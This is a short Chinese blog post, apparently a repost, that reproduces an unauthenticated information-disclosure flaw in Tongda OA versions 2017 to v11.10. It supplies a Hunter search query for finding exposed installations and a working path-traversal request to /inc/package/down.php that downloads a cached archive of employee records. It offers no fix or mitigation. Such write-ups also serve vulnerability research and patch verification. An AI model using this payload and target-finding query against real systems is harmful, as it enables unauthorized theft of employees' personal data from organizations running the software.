本文主要是介绍【漏洞复现-通达OA】通达OA down 未授权员工信息泄露漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一、漏洞简介
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA down 未授权员工信息泄露漏洞。
二、影响版本
● 通达OA2017-v11.10
三、资产测绘
● hunter:app.name="通达 OA"
● 登录页面
四、漏洞复现
通过poc下载文件
/inc/package/down.php?id=../../../cache/org
解压后即可看到员工信息
这篇关于【漏洞复现-通达OA】通达OA down 未授权员工信息泄露漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!